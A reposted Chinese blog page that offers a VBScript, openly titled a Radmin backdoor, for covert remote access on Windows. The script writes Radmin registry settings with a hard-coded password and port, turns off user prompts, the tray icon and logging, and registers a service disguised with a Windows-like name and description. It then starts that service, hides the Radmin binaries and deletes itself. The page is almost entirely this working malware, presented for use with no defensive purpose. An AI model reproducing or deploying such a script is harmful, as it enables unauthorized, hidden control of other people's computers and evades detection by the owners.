gpt4 book ai didi

Vbs脚本实现radmin终极后门代码_删除自身

转载 作者:qq735679552 更新时间:2022-09-29 22:32:09 24 4
gpt4 key购买 nike

CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.

这篇CFSDN的博客文章Vbs脚本实现radmin终极后门代码_删除自身由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.

复制代码 代码如下

on error resume next  const HKEY_LOCAL_MACHINE = &H80000002  strComputer = "."  Set StdOut = WScript.StdOut  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_   strComputer & "\root\default:StdRegProv")  strKeyPath = "SYSTEM\RAdmin"  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = "SYSTEM\RAdmin\v2.0"  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = "SYSTEM\RAdmin\v2.0\Server"  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")  strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"  uBinary = Array(0,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)  uBinary = Array(0,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)  uBinary = Array(1,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)  uBinary = Array(0,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)  uBinary = Array(0,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)  uBinary = Array(0,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)  uBinary = Array(0,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)  uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)        //此为注册表导出十六进制转为十进制数据 pass:241241241  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)    //Radmin密码  uBinary = Array(5,4,0,0)      //端口:1029  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)  uBinary = Array(10,0,0,0)  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"  strValueName = "LogFilePath"  strValue = "c:\logfile.txt"  set wshshell=createobject ("wscript.shell")  a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)  oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")  strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"  strValueName = "Description"  strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."  oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  strValueName = "DisplayName"  strValue = "Windows Management Instrumentation Player Drivers"  oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  strValueName = "ImagePath"  strValue = "c:\windows\system32\Exporer.exe /service"  oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  set wshshell=createobject ("wscript.shell")  a=wshshell.run ("net start WinManageHelp",0)  b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)  c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0)  d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)    //自删除 。

最好的删除代码不错 createobject("scripting.filesystemobject").deletefile(script.scriptname) 。

最后此篇关于Vbs脚本实现radmin终极后门代码_删除自身的文章就讲到这里了,如果你想了解更多关于Vbs脚本实现radmin终极后门代码_删除自身的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com